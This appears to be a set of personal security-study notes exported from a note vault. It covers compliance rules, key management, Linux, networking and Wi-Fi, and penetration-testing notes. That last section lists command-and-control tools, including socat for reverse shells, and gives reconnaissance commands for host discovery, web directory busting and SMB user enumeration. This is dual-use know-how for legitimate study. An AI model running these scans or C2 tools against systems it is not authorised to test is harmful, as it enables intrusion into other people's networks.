Most regulations mandate solid password management strategies. For example, organizations must not use vendor-supplied defaults for system passwords and security parameters. This requirement also extends far beyond its title and enters the realm of configuration management. In addition, most of these regulations mandate specific implementation standards, including password length, password complexity, and session timeout, as well as the use of multifactor authentication.

Key Management

This is another important element that is also evaluated and mandated by most regulations. A key is a value that specifies what part of the algorithm to apply and in what order, as well as what variables to input. Much as with authentication passwords, it is critical to use a strong key that cannot be discovered and to protect the key from unauthorized access. Protecting the key is generally referred to as key management. NIST SP 800-57: Recommendations for Key Management, Part 1: General (Revision 4) provides general guidance and best practices for the management of cryptographic keying material. Part 2: Best Practices for Key Management Organization provides guidance on policy and security planning requirements for U.S. government agencies. Part 3: Application Specific Key Management Guidance provides guidance when using the cryptographic features of current systems. In the Introduction to Part 1, NIST describes the importance of key management as follows:

The proper management of cryptographic keys is essential to the effective use of cryptography for security. Keys are analogous to the combination of a safe. If a safe combination is known to an adversary, the strongest safe provides no security against penetration. Similarly, poor key management may easily compromise strong algorithms. Ultimately, the security of information protected by cryptography directly depends on the strength of the keys, the effectiveness of mechanisms and protocols associated with keys, and the protection afforded to the keys. All keys need to be protected against modification, and secret and private keys need to be protected against unauthorized disclosure. Key management provides the foundation for the secure generation, storage, distribution, use, and destruction of keys.

Key management policy and standards should include assigned responsibility for key management, the nature of information to be protected, the classes of threats, the cryptographic protection mechanisms to be used, and the protection requirements for the key and associated processes.

NOTE The following website includes NIST’s general key management guidance: https://csrc.nist.gov/projects/key-management/key-management-guidelines.

Regulations

General Data Protection Regulation (GDPR)

GDPR includes strict rules around the processing of data and privacy. One of the GDPR’s main goals is to strengthen and unify data protection for individuals within the European Union (EU), while addressing the export of personal data outside the EU. In short, the primary objective of the GDPR is to give citizens control of their personal data. You can obtain additional information about GDPR at https://gdpr-info.eu.

PCI DSS

In order to protect cardholders against misuse of their personal information and to minimize payment card channel losses, the major payment card brands (Visa, MasterCard, Discover, and American Express) formed the Payment Card Industry Security Standards Council (PCI SSC) and developed the Payment Card Industry Data Security Standard (PCI DSS). The PCI DSS regulation aims to secure the processing of credit card payments and other types of digital payments. PCI DSS specifications, documentation, and resources can be accessed at https://www.pcisecuritystandards.org.

PCI DSS must be adopted by any organization that transmits, processes, or stores payment card data or that directly or indirectly affects the security of cardholder data. Any organization that leverages a third party to manage cardholder data has the full responsibility of ensuring that this third party is compliant with PCI DSS. The payment card brands can levy fines and penalties against organizations that do not comply with the requirements and/or can revoke their authorization to accept payment cards.

To counter the potential for staggering losses, the payment card brands contractually require that all organizations that store, process, or transmit cardholder data and/or sensitive authentication data comply with PCI DSS. PCI DSS requirements apply to all system components where account data is stored, processed, or transmitted. Account data consists of cardholder data as well as sensitive authentication data. A system component is any network component, server, or application that is included in, or connected to, the cardholder data environment. The cardholder data environment is defined as the people, processes, and technology that handle cardholder data or sensitive authentication data.

| Cardholder Data | Sensitive Authentication Data | | ---------------------------- | ------------------------------------------------------ | | Primary account number (PAN) | Full magnetic stripe data or equivalent data on a chip | | Cardholder name | CAV2/CVC2/CVV2/CID | | Expiration date | PINs/PIB blocks | | Service code | | The PAN is the defining factor in the applicability of PCI DSS requirements. PCI DSS requirements apply if the PAN is stored, processed, or transmitted. If the PAN is not stored, processed, or transmitted, PCI DSS requirements do not apply. If cardholder name, service code, and/or expiration date are stored, processed, or transmitted with the PAN or are otherwise present in the cardholder data environment, they too must be protected. Per the standards, the PAN must be stored in an unreadable (encrypted) format. Sensitive authentication data may never be stored post-authorization, even if encrypted.

The Luhn algorithm, or Luhn formula, is an industry algorithm used to validate different identification numbers, including credit card numbers, International Mobile Equipment Identity (IMEI) numbers, national provider identifier numbers in the United States, Canadian Social Insurance Numbers, and more. The Luhn algorithm, created by Hans Peter Luhn in 1954, is now in the public domain. Most credit cards and many government organizations use the Luhn algorithm to validate numbers. The Luhn algorithm is based on the principle of modulo arithmetic and digital roots. It uses modulo-10 mathematics.

HIPAA

The original intent of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) regulation was to simplify and standardize healthcare administrative processes. Administrative simplification called for the transition from paper records and transactions to electronic records and transactions. The U.S. Department of Health and Human Services (HHS) was instructed to develop and publish standards to protect an individual’s electronic health information while permitting appropriate access and use of that information by healthcare providers and other entities. Information about HIPAA can be obtained from https://www.cdc.gov/phlp/publications/topic/hipaa.html.

On February 20, 2003, the Security Standards for the Protection of Electronic Protected Health Information, known as the HIPAA Security Rule, was published. The Security Rule requires technical and nontechnical safeguards to protect electronic health information. The corresponding HIPAA Security Enforcement Final Rule was issued on February 16, 2006. Since then, the following legislation has modified and expanded the scope and requirements of the Security Rule:

The 2009 Health Information Technology for Economic and Clinical Health Act (known as the HITECH Act)
The 2009 Breach Notification Rule
The 2013 Modifications to the HIPAA Privacy, Security, Enforcement, and Breach Notification Rules under the HITECH Act and the Genetic Information Nondiscrimination Act; Other Modifications to the HIPAA Rules (known as the Omnibus Rule) HHS has published additional cybersecurity guidance to help healthcare professionals defend against security vulnerabilities, ransomware, and modern cybersecurity threats. See https://www.hhs.gov/hipaa/for-professionals/security/guidance/ cybersecurity/index.html.

The HIPAA Security Rule focuses on safeguarding electronic protected health information (ePHI), which is defined as individually identifiable health information (IIHI) that is stored, processed, or transmitted electronically. The HIPAA Security Rule applies to covered entities and business associates. Covered entities include healthcare providers, health plans, healthcare clearinghouses, and certain business associates. Select each covered entity for more information.

FedRAMP

The U.S. federal government uses the Federal Risk and Authorization Management Program (FedRAMP) standard to authorize the use of cloud service offerings. You can obtain information about FedRAMP at https://www.fedramp.gov.

Regulations in the Financial Sector

The financial sector is responsible for safeguarding customer information and maintaining the critical infrastructure of financial services. Examples of regulations applicable to the financial sector:

Title V, Section 501(b) of the Gramm-Leach-Bliley Act (GLBA) and the corresponding interagency guidelines
The Federal Financial Institutions Examination Council (FFIEC)
The Federal Deposit Insurance Corporation (FDIC) Safeguards Act and Financial Institutions Letters (FILs)
The New York Department of Financial Services Cybersecurity Regulation (NY DFS Cybersecurity Regulation; 23 NYCRR Part 500) GLBA applies to all financial services organizations, including non-traditional financial institutions such as check-cashing businesses, payday lenders, and technology vendors providing loans to clients. Compliance with some regulations, such as GLBA and NY DFS Cybersecurity Regulation, is mandatory. The regulations mandate financial institutions to undergo periodic penetration testing and vulnerability assessments in their infrastructure. The Federal Trade Commission (FTC) is responsible for enforcing GLBA as it pertains to financial firms not covered by federal banking agencies, the Securities and Exchange Commission (SEC), the Commodity Futures Trading Commission (CFTC), and state insurance authorities.

[Vault: Root] Languages

Thu, 09 Oct 2025 10:02:49 GMT

C

C is a general-purpose, procedural computer programming language. It was developed in the early 1970s by Dennis Ritchie at Bell Labs and is known for its efficiency, portability, and close relationship with hardware. C is widely used for system programming, including operating systems, embedded systems, and game development.

[[Languages/Python|Python]]

Python is a high-level, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation. Python is dynamically type-checked and garbage-collected. Wikipedia

Python is one of the most popular programming languages in the industry. It's widely used in various domains, including web development, data science, machine learning, and scripting. It can be used to automate repetitive tasks and create sophisticated applications; it can also be used in penetration testing. Characterisitics:

Interpreted: Python code is executed line by line, which simplifies debugging and testing.
Object-Oriented: Supports object-oriented programming principles like classes and objects, promoting modularity and reusability.
High-Level: Python abstracts away many low-level details, allowing developers to focus on the logic of their programs.
Dynamically Typed: Python determines the data type of a variable at runtime, offering flexibility.
Large Standard Library: Python comes with a vast collection of pre-built modules and packages, providing functionalities for various tasks.
Cross-Platform: Python runs on different operating systems like Windows, macOS, and Linux.
Extensible: Python can be extended with code written in other languages like C or C++.

The following websites provide examples of Python programming concepts, tutorials, examples, and cheat sheets:

W3 Schools Python Tutorial: https://www.w3schools.com/python
Tutorials Point Python Tutorial: https://www.tutorialspoint.com/python/index.htm
The Python Guru: https://thepythonguru.com
A comprehensive list of Python resources: https://github.com/vinta/awesome-python

JavaScript

JavaScript, often abbreviated as JS, is a high-level, multi-paradigm programming language and one of the core technologies of the World Wide Web, alongside HTML and CSS. It is primarily known for enabling interactive and dynamic content on websites. Characteristics:

Client-side scripting
Server-side development
Mobile and Desktop Applications
Multi-paradigm
Integration with HTML and CSS
Lightweight and Interpreted

The following are several resources that can help you learn JavaScript :

A Re-introduction to Java Script: https://developer.mozilla.org/en-US/docs/Web/JavaScript/A_re-introduction_to_JavaScript
MDN JavaScript Reference: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference
Eloquent JavaScript: https://eloquentjavascript.net/
Code Academy introduction to JavaScript: https://www.codecademy.com/learn/introduction-to-javascript
W3 Schools JavaScript Tutorial: https://www.w3schools.com/js/default.asp

Ruby

Ruby is a dynamic, object-oriented, general-purpose programming language known for its user-friendly syntax and focus on developer productivity. It's often used for web development, particularly with the Ruby on Rails framework, but also for scripting and other applications. Fetaures:

Object-Oriented
Dynamic Typing
Interpreted
User-Friendly Syntax
Extensible

The following websites provide examples of Ruby programming concepts, tutorials, examples, and cheat sheets:

Ruby in Twenty Minutes tutorial: https://www.ruby-lang.org/en/documentation/quickstart/
Learn Ruby Online interactive Ruby tutorial: https://www.learnrubyonline.org
A GitHub repository that includes a community-driven collection of awesome Ruby libraries, tools, frameworks, and software: https://github.com/markets/awesome-ruby

PowerShell

PowerShell is a cross-platform command-line shell and scripting language developed by Microsoft, primarily designed for task automation and configuration management. It is built on the .NET framework and combines the functionality of a command-line interpreter with a robust scripting environment.

PowerShell and related tools can be used for exploitation and post-exploitation activities. Microsoft has a vast collection of free video courses and tutorials that include PowerShell. Search for "powershell" at learn.microsoft.com.

Perl

Perl is a programming language developed by Larry Wall, especially designed for text processing. It stands for Practical Extraction and Report Language. It runs on a variety of platforms, such as Windows, Mac OS, and the various versions of UNIX.

There are many different online resources that can be used to learn the Perl programming language. The following are a few examples:

TutorialsPoint Perl Tutorial: https://www.tutorialspoint.com/perl/index.htm
PerTutorial.org: https://www.perltutorial.org/
PerlMaven Tutorial: https://perlmaven.com/perl-tutorial

[Vault: Linux] bash

Thu, 09 Oct 2025 10:02:49 GMT

Bash is a command shell and language interpreter that is available for operating systems such as Linux, macOS, and even Windows. The name Bash is an acronym for the Bourne-Again shell. A shell is a command-line tool that allows for interactive or non-interactive command execution. Having a good background in Bash enables you to quickly create scripts, parse data, and automate different tasks and can be helpful in penetration testing engagements.

The following websites provide examples of Bash scripting concepts, tutorials, examples, and cheat sheets:

Linux Config Bash Scripting Tutorial: https://linuxconfig.org/bash-scripting-tutorial
DevHints Bash Shell Programming Cheat Sheet: https://devhints.io/bash

[Vault: Linux] linux commands

Thu, 09 Oct 2025 10:02:49 GMT

lsb_release -a - distro info
printenv - list all environment variables
where - Reports all known instances of a command. It could be an executable in the PATH environment variable, an alias, or a shell builtin.
whereis - Locate the binary, source, and manual page files for a command.
which - Locate a program in the user's path.
whatis - Display one-line descriptions from manual pages.
locate - find files by name, quickly
stat: Displays file or file system status, providing detailed information.
- stat <filename>
- stat -f <path_to_filesystem_mount_point>
file : show file information
lsblk - disk/partition info
df - shows storage info
lshw: List Hardware. Provides detailed information about the machine's hardware configuration. https://linux.die.net/man/1/lshw
- sudo lshw
- sudo lshw -c <class> (e.g., sudo lshw -c cpu, sudo lshw -c memory, sudo lshw -c network, sudo lshw -c disk)
lsof (List Open Files): Lists information about files opened by processes. https://linux.die.net/man/8/lsof
- lsof
- sudo lsof -i :<port_number> (e.g., sudo lsof -i :22)
top - display linux processes
journalctl - view logs
- journalctl -u [service] - view logs of a specific service
- journalctl -fu [service] - follow mode. (live)'
rsync - transfer and sync files
watch: Executes a program periodically, showing its output and errors. https://linux.die.net/man/1/watch
- watch [options] <command> (e.g., watch -n 0.5 nvidia-smi)
systemd-analyze blame: Prints a list of all running units, ordered by the time they took to initialize during boot. https://www.freedesktop.org/software/systemd/man/systemd-analyze.html
- systemd-analyze blame
systemd-analyze critical-chain: Prints a tree of the time-critical chain of units during boot. https://www.freedesktop.org/software/systemd/man/systemd-analyze.html
- systemd-analyze critical-chain [unit_name...]

[Vault: Linux] Linux File permissions and ownership

Thu, 09 Oct 2025 10:02:49 GMT

In Linux, permissions are represented with a 10-character string. Permissions include:

read: for files, this is the ability to read the file contents; for directories, this is the ability to read all contents in the directory including both files and subdirectories
write: for files, this is the ability to make modifications on the file contents; for directories, this is the ability to create new files in the directory
execute: for files, this is the ability to execute the file if it’s a program; for directories, this is the ability to enter the directory and access its files

These permissions are given to these types of owners:

user: the owner of the file
group: a larger group that the owner is a part of
other: all other users on the system

Each character in the 10-character string conveys different information about these permissions. The following table describes the purpose of each character:

|Character|Example|Meaning| |---|---|---| |1st|drwxrwxrwx|file type- d for directory - - for a regular file| |2nd|drwxrwxrwx|read permissions for the user- r if the user has read permissions - - if the user lacks read permissions| |3rd|drwxrwxrwx|write permissions for the user- w if the user has write permissions - - if the user lacks write permissions| |4th|drwxrwxrwx|execute permissions for the user- x if the user has execute permissions - - if the user lacks execute permissions| |5th|drwxrwxrwx|read permissions for the group- r if the group has read permissions - - if the group lacks read permissions| |6th|drwxrwxrwx|write permissions for the group- w if the group has write permissions - - if the group lacks write permissions| |7th|drwxrwxrwx|execute permissions for the group- x if the group has execute permissions - - if the group lacks execute permissions| |8th|drwxrwxrwx|read permissions for other- r if the other owner type has read permissions - - if the other owner type lacks read permissions| |9th|drwxrwxrwx|write permissions for other- w if the other owner type has write permissions - - if the other owner type lacks write permissions| |10th|drwxrwxrwx|execute permissions for other- x if the other owner type has execute permissions - - if the other owner type lacks execute permissions|

Exploring existing permissions

You can use the ls command to investigate who has permissions on files and directories. Previously, you learned that ls displays the names of files in directories in the current working directory.

There are additional options you can add to the ls command to make your command more specific. Some of these options provide details about permissions. Here are a few important ls options for security analysts:

ls -a: Displays hidden files. Hidden files start with a period (.) at the beginning.
ls -l: Displays permissions to files and directories. Also displays other additional information, including owner name, group, file size, and the time of last modification.
ls -la: Displays permissions to files and directories, including hidden files. This is a combination of the other two options.

Changing permissions

The principle of least privilege is the concept of granting only the minimal access and authorization required to complete a task or function. In other words, users should not have privileges that are beyond what is necessary. Not following the principle of least privilege can create security risks.

The chmod command can help you manage this authorization. The chmod command changes permissions on files and directories.

Using chmod

The chmod command requires two arguments. The first argument indicates how to change permissions, and the second argument indicates the file or directory that you want to change permissions for. For example, the following command would add all permissions to login_sessions.txt:

chmod u+rwx,g+rwx,o+rwx login_sessions.txt

If you wanted to take all the permissions away, you could use

chmod u-rwx,g-rwx,o-rwx login_sessions.txt

Another way to assign these permissions is to use the equals sign (=) in this first argument. Using = with chmod sets, or assigns, the permissions exactly as specified. For example, the following command would set read permissions for login_sessions.txt for user, group, and other:

chmod u=r,g=r,o=r login_sessions.txt

This command overwrites existing permissions. For instance, if the user previously had write permissions, these write permissions are removed after you specify only read permissions with =.

The following table reviews how each character is used within the first argument of chmod:

|Character|Description| |---|---| |u|indicates changes will be made to user permissions| |g|indicates changes will be made to group permissions| |o|indicates changes will be made to other permissions| |+|adds permissions to the user, group, or other| |-|removes permissions from the user, group, or other| |=|assigns permissions for the user, group, or other|

Note: When there are permission changes to more than one owner type, commas are needed to separate changes for each owner type. You should not add spaces after those commas.

![[attachments/Pasted-image-20230720211432.png]]

The principle of least privilege in action

As a security analyst, you may encounter a situation like this one: There’s a file called bonuses.txt within a compensation directory. The owner of this file is a member of the Human Resources department with a username of hrrep1. It has been decided that hrrep1 needs access to this file. But, since this file contains confidential information, no one else in the hr group needs access.

You run ls -l to check the permissions of files in the compensation directory and discover that the permissions for bonuses.txt are -rw-rw----. The group owner type has read and write permissions that do not align with the principle of least privilege.

To remedy the situation, you input chmod g-rw bonuses.txt. Now, only the user who needs to access this file to carry out their job responsibilities can access this file.

[Vault: Linux] Linux processes

Thu, 09 Oct 2025 10:02:49 GMT

View Running Processes in Linux

The ps command without any options displays information about processes that are bound by the controlling terminal. Better command : ps auxf

The a flag stands for 'all.' When used with ps, it lists processes from all users on the system.
The u flag stands for 'user.' It provides detailed information about each process, including the user that owns the process.
The x flag stands for 'extended.' It lists processes not attached to a terminal, such as system services.
The f flag do full-format listing

Another tool is top which can help you see all of the processes running on your system with live usage statistics.

Process management

After you press ctrl+z it will pause execution of the current process and move it to the background. If you wish to start running it in the background, then type bg after pressing ctrl-z. If you wish to have it run in the foreground (and take away your ability to enter new commands into the prompt), type fg after pressing ctrl-z If you wish to run it in the background right from the beginning use & at the end of your command.

To list all of the suspended processes in the background, you can use two different commands: ps and jobs (recommended). ps command-list all of the running processes in your system. While the jobs command only lists the suspend process suspended using the CTRL+Z shortcut key in your Linux system.

You can additionally run disown to detach the now-backgrounded process from the terminal. This lets you close the terminal window without affecting the backgrounded program.

To kill a process use kill [pid]. This sends the TERM signal to the process. The TERM signal tells the process to please terminate. This allows the program to perform clean-up operations and exit smoothly. If the program is misbehaving and does not exit when given the TERM signal, you can escalate the signal by passing the KILL signal: kill -KILL [pid] This is a special signal that is not sent to the program. Instead, it is given to the operating system kernel, which shuts down the process. This is used to bypass programs that ignore the signals sent to them.

Manage Services

to start a service at startup sudo systemctl enable [service]
start apache http web server sudo service apache2 start to start a apache2 server which will host the location /var/www/html
python http server python3 -m http.server 80 to start a python server which will host everything in the current directory

https://www.digitalocean.com/community/tutorials/how-to-use-ps-kill-and-nice-to-manage-processes-in-linux
https://iximiuz.com/en/posts/how-to-on-processes/

[Vault: Linux] terminal tools

Thu, 09 Oct 2025 10:02:49 GMT

utility

z (zoxide): A smarter cd command that learns your frequently and recently used directories. https://github.com/ajeetdsouza/zoxide
- z <partial_directory_name>
- zi (Interactive selection)
fzf (Fuzzy Finder): A command-line fuzzy finder for interactively filtering lists. https://github.com/junegunn/fzf
- history | fzf (Search command history)
- ls | fzf (Find a file in the current directory)
exa: A modern replacement for ls with more features like colors, tree view, Git integration, and icons. https://github.com/ogham/exa
- exa
- exa -l (Long format)
- exa -T (Tree view)
bat: https://github.com/sharkdp/bat
eza: https://github.com/eza-community/eza
ncdu: Disk usage analyzer with an ncurses interface. It helps you see which directories and files are consuming the most space. https://dev.yorhel.nl/ncdu/man
- ncdu (Navigate with arrow keys, see sizes, delete files/directories)
duf: Disk Usage/Free utility. Provides a user-friendly, colorized overview of mounted filesystems and their usage. https://github.com/muesli/duf
- duf
rg (ripgrep): A very fast, line-oriented search tool that recursively searches your current directory for a regex pattern. https://github.com/BurntSushi/ripgrep
- rg <pattern> [path] (e.g., rg "my_function", rg "def ", rg "API key")
fd: A simple, fast, and user-friendly alternative to find. https://github.com/sharkdp/fd
- fd <pattern> (Searches recursively and case-insensitively by default)
glances: A cross-platform system monitoring tool displaying a large amount of system information. https://nicolargo.github.io/glances/
- glances
iotop: A top-like utility for displaying I/O usage by processes. https://github.com/dgibson/iotop
- sudo iotop
dstat: A versatile replacement for vmstat, iostat, netstat, and ifstat for viewing system resources. https://github.com/dstat-team/dstat
- dstat
- dstat -tcmsdn (Time, cpu, memory, swap, disk, network)
- dstat --top-cpu
progress: Monitors the progress of coreutils basic commands like cp, mv, dd, tar, etc. https://github.com/Xfennec/progress
- progress (Run in a separate terminal while another command is active)
direnv: https://direnv.net/
kubectx and kubens: https://github.com/ahmetb/kubectx
iperf3: https://iperf.fr/

networking

tcpdump: https://www.tcpdump.org/
termshark: A terminal user interface for tshark (Wireshark's command-line version) to analyze network traffic. https://github.com/gcla/termshark
- sudo termshark
- sudo termshark -Y "dns" (Filter for DNS traffic)
dog: A command-line DNS client, often user-friendly and feature-rich. https://github.com/ogham/dog
- dog <domain_name> [record_type]
ipcalc: Performs IP subnet calculations. https://github.com/border/ipcalc
- ipcalc <IP_address>[/CIDR_or_netmask] (e.g., ipcalc 10.7.8.94/18)
mtr (My Traceroute): Network diagnostic tool combining ping and traceroute functionality, showing route and performance. https://www.bitwizard.nl/mtr/
- mtr <hostname_or_IP>

misc

jq: https://jqlang.github.io/jq/
cmatrix: https://github.com/abishekvashok/cmatrix
wormhole (magic-wormhole): A tool to securely transfer files and directories between computers using a "wormhole code". https://github.com/magic-wormhole/magic-wormhole
- Sender: wormhole send <filename>
- Receiver: wormhole receive <code>
mosh (Mobile Shell): A remote terminal application for robust connections, supporting roaming and intermittent connectivity. https://mosh.org
- mosh [user@]hostname (Requires Mosh on client and server)

[Vault: Networking] Subnetting

Thu, 09 Oct 2025 10:02:49 GMT

Subnetting is the process of logically dividing a large IP network into smaller, manageable sub-networks (subnets) to improve performance, security, and IP address efficiency. It reduces network congestion by limiting broadcast traffic and allows for better organization of network resources. Subnets are defined using a subnet mask to separate network and host portions. Subnet mask is represented as a number of four bytes (32 bits), ranging from 0 to 255 (0-255).

Classless Inter-Domain Routing notation for subnetting

Classless Inter-Domain Routing (CIDR) is a method of assigning subnet masks to IP addresses to create a subnet. Classless addressing replaces classful addressing. Classful addressing was used in the 1980s as a system of grouping IP addresses into classes (Class A to Class E). Each class included a limited number of IP addresses, which were depleted as the number of devices connecting to the internet outgrew the classful range in the 1990s. Classless CIDR addressing expanded the number of available IPv4 addresses.

CIDR allows cybersecurity professionals to segment classful networks into smaller chunks. CIDR IP addresses are formatted like IPv4 addresses, but they include a slash (“/’”) followed by a number at the end of the address, This extra number is called the IP network prefix. For example, a regular IPv4 address uses the 198.51.100.0 format, whereas a CIDR IP address would include the IP network prefix at the end of the address, 198.51.100.0/24. This CIDR address encompasses all IP addresses between 198.51.100.0 and 198.51.100.255. The system of CIDR addressing reduces the number of entries in routing tables and provides more available IP addresses within networks

[Vault: Networking] Wireless Protocols

Thu, 09 Oct 2025 10:02:49 GMT

Wireless Protocols

Wi-Fi refers to a set of standards that define communication for wireless LANs. Wi-Fi is a marketing term commissioned by the Wireless Ethernet Compatibility Alliance (WECA). WECA has since renamed their organization Wi-Fi Alliance. Wi-Fi standards and protocols are based on the 802.11 family of internet communication standards determined by the Institute of Electrical and Electronics Engineers (IEEE). So, as a security analyst, you might also see Wi-Fi referred to as IEEE 802.11.

Wired Equivalent Privacy

Wired equivalent privacy (WEP) is a wireless security protocol designed to provide users with the same level of privacy on wireless network connections as they have on wired network connections. WEP was developed in 1999 and is the oldest of the wireless security standards.

Wi-Fi Protected Access

Wi-Fi Protected Access (WPA) was developed in 2003 to improve upon WEP, address the security issues that it presented, and replace it. WPA was always intended to be a transitional measure so backwards compatibility could be established with older hardware. The flaws with WEP were in the protocol itself and how the encryption was used. WPA addressed this weakness by using a protocol called Temporal Key Integrity Protocol (TKIP). WPA encryption algorithm uses larger secret keys than WEPs, making it more difficult to guess the key by trial and error. WPA also includes a message integrity check that includes a message authentication tag with each transmission. If a malicious actor attempts to alter the transmission in any way or resend at another time, WPA’s message integrity check will identify the attack and reject the transmission. Despite the security improvements of WPA, it still has vulnerabilities. Malicious actors can use a key reinstallation attack (or KRACK attack) to decrypt transmissions using WPA. Attackers can insert themselves in the WPA authentication handshake process and insert a new encryption key instead of the dynamic one assigned by WPA. If they set the new key to all zeros, it is as if the transmission is not encrypted at all.

WPA2 & WPA3

WPA2

The second version of Wi-Fi Protected Access—known as WPA2—was released in 2004. WPA2 improves upon WPA by using the Advanced Encryption Standard (AES). WPA2 also improves upon WPA’s use of TKIP. WPA2 uses the Counter Mode Cipher Block Chain Message Authentication Code Protocol (CCMP), which provides encapsulation and ensures message authentication and integrity. Because of the strength of WPA2, it is considered the security standard for all Wi-Fi transmissions today. WPA2, like its predecessor, is vulnerable to KRACK attacks. This led to the development of WPA3 in 2018.

Personal

WPA2 personal mode is best suited for home networks for a variety of reasons. It is easy to implement, initial setup takes less time for personal than enterprise version. The global passphrase for WPA2 personal version needs to be applied to each individual computer and access point in a network. This makes it ideal for home networks, but unmanageable for organizations.

Enterprise

WPA2 enterprise mode works best for business applications. It provides the necessary security for wireless networks in business settings. The initial setup is more complicated than WPA2 personal mode, but enterprise mode offers individualized and centralized control over the Wi-Fi access to a business network. This means that network administrators can grant or remove user access to a network at any time. Users never have access to encryption keys, this prevents potential attackers from recovering network keys on individual computers.

WPA3

WPA3 is a secure Wi-Fi protocol and is growing in usage as more WPA3 compatible devices are released. These are the key differences between WPA2 and WPA3:

WPA3 addresses the authentication handshake vulnerability to KRACK attacks, which is present in WPA2.
WPA3 uses Simultaneous Authentication of Equals (SAE), a password-authenticated, cipher-key-sharing agreement. This prevents attackers from downloading data from wireless network connections to their systems to attempt to decode it.
WPA3 has increased encryption to make passwords more secure by using 128-bit encryption, with WPA3-Enterprise mode offering optional 192-bit encryption.
[[Wireless Vulnerabilities and Attacks]]

[Vault: Offensive Security] Bug Bounty

Thu, 09 Oct 2025 10:02:49 GMT

Bug bounty programs enable security researchers and penetration testers to get recognition (and often monetary compensation) for finding vulnerabilities in websites, applications, or any other types of systems. Companies like Microsoft, Apple, and Cisco and even government institutions such as the U.S. Department of Defense (DoD) use bug bounty programs to reward security professionals when they find vulnerabilities in their systems. Many security companies, such as HackerOne, Bugcrowd, Intigriti, and SynAck, provide platforms for businesses and security professionals to participate in bug bounty programs. These programs are different from traditional penetration testing engagements but have a similar goal: finding security vulnerabilities to allow the organization to fix them before malicious attackers are able to exploit such vulnerabilities.

Resources

The Bug Hunter's Methodology (TBHM) by jhaddix : https://github.com/jhaddix/tbhm
Bug bounty tips and resources in my GitHub repository at: https://github.com/The-Art-of-Hacking/h4cker/tree/master/bug-bounties.

[Vault: Offensive Security] Command and Control (C2) Utilities

Thu, 09 Oct 2025 10:02:49 GMT

Attackers often use command and control (often referred to as C2 or CnC) systems to send commands and instructions to compromised systems. The C2 can be the attacker’s system (for example, desktop, laptop) or a dedicated virtual or physical server. A C2 creates a covert channel with the compromised system. A covert channel is an adversarial technique that allows the attacker to transfer information objects between processes or systems that, according to a security policy, are not supposed to be allowed to communicate.

Attackers often use virtual machines in a cloud service or even use other compromised systems as C2 servers. Even services such as Twitter, Dropbox, and Photobucket have been used for C2 tasks. The C2 communication can be as simple as maintaining a timed beacon, or “heartbeat,” to launch additional attacks or for data exfiltration.

Many different techniques and utilities can be used to create a C2.

socat

A C2 utility that can be used to create multiple reverse shells (see http://www.dest-unreach.org/socat)

wsc2

A Python-based C2 utility that uses WebSockets (see https://github.com/Arno0x/WSC2)

WMImplant

A PowerShell-based tool that leverages WMI to create a C2 channel (see https://github.com/ChrisTruncer/WMImplant)

DropboxC2 (DBC2)

A C2 utility that uses Dropbox (see https://github.com/Arno0x/DBC2)

TrevorC2

A Python-based C2 utility created by Dave Kennedy of TrustedSec (see https://github.com/trustedsec/trevorc2)

Twittor

A C2 utility that uses Twitter direct messages for command and control (see https://github.com/PaulSec/twittor)

DNSCat2

A DNS-based C2 utility that supports encryption and that has been used by malware, threat actors, and pen testers (see https://github.com/iagox86/dnscat2)

[!tip] A large number of open-source C2 and adversarial emulation tools are listed in The C2 Matrix, along with supported features, implant support, and other information, at https://www.thec2matrix.com.

[Vault: Offensive Security] Enumeration

Thu, 09 Oct 2025 10:02:49 GMT

Enumeration and Scanning

A port scan is an active scan in which the scanning tool sends various types of probes to the target IP address and then examines the responses to determine whether the service is actually listening.

Enumeration is the process of systematically probing a target for information.

Quick Workflow and Tooling

Identify IP

use arp-scan -l
use netdiscover -r 192.168.50.0/24 (put the first 3 parts of your ip & .0/24)

Web Enumeration

[[Nikto]]
- web vulnerability scanner
- usage: nikto -h [web address (eg: http://192.168.57.8)]

Directory Busting

dirbuster usage: dirbuster& opens gui
dirb usage: dirb [uri (http://192.168.60.6)]
gobuster: written in Go - https://github.com/OJ/gobuster.
ffuf usage: ffuf -w [wordlist]:FUZZ -u [uri]/FUZZ
- wordlist - /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dirsearch : dirsearch -u [url]
feroxbuster: This web application reconnaissance fuzzer is written in Rust. You can download feroxbuster from https://github.com/epi052/feroxbuster.

SMB Enumeration

use [[Metasploit]]
connecting to SMB
- smbclient -L \\\\[ip]\\

Vulnerability Scanning and Research

We can use [[Nessus]] to scan for vulnerabilities
Google for vulnerabilities in various services with version no
Searchsploit

Types of Enumeration

Host Enumeration
User Enumeration
Group Enumeration
Network Share Enumeration
Additional SMB Enumeration Examples
Web Page Enumeration/Web Application Enumeration
Service Enumeration
Exploring Enumeration via Packet Crafting

Host Enumeration

The enumeration of hosts is one of the first tasks you need to perform in the information-gathering phase of a penetration test. Host enumeration is performed internally and externally. When performed externally, you typically want to limit the IP addresses you are scanning to just the ones that are part of the scope of the test. This reduces the chance of inadvertently scanning an IP address that you are not authorized to test. When performing an internal host enumeration, you typically scan the full subnet or subnets of IP addresses being used by the target. Host enumeration is usually performed using a tool such as Nmap or Masscan; however, vulnerability scanners also perform this task as part of their automated testing.

User Enumeration

Gathering a valid list of users is the first step in cracking a set of credentials. When you have the username, you can then begin brute-force attempts to get the account password. You perform user enumeration when you have gained access to the internal network. On a Windows network, you can do this by manipulating the Server Message Block (SMB) protocol, which uses TCP port 445.

The information contained in the responses to these messages enables you to reveal information about the server:

SMB_COM_NEGOTIATE: This message allows the client to tell the server what protocols, flags, and options it would like to use. The response from the server is also an SMB_COM_NEGOTIATE message. This response is relayed to the client about which protocols, flags, and options it prefers. This information can be configured on the server itself. A misconfiguration sometimes reveals information that you can use in penetration testing. For instance, the server might be configured to allow messages without signatures. You can determine if the server is using share- or user-level authentication mechanisms and whether the server allows plaintext passwords. The response from the server also provides additional information, such as the time and time zone the server is using. This is necessary information for many penetration testing tasks.
SMB_COM_SESSION_SETUP_ANDX : After the client and server have negotiated the protocols, flags, and options they will use for communication, the authentication process begins. Authentication is the primary function of the SMB_COM_SESSION_SETUP_ANDX message. The information sent in this message includes the client username, password, and domain. If this information is not encrypted, it is easy to sniff it right off the network. Even if it is encrypted, if the mechanism being used is not sufficient, the information can be revealed using tools such as Lanman and NTLM in the case of Microsoft Windows implementations. The following example shows this message being used with the smb-enum-users.nse script: nmap --script smb-enum-users.nse <host>_

Group Enumeration

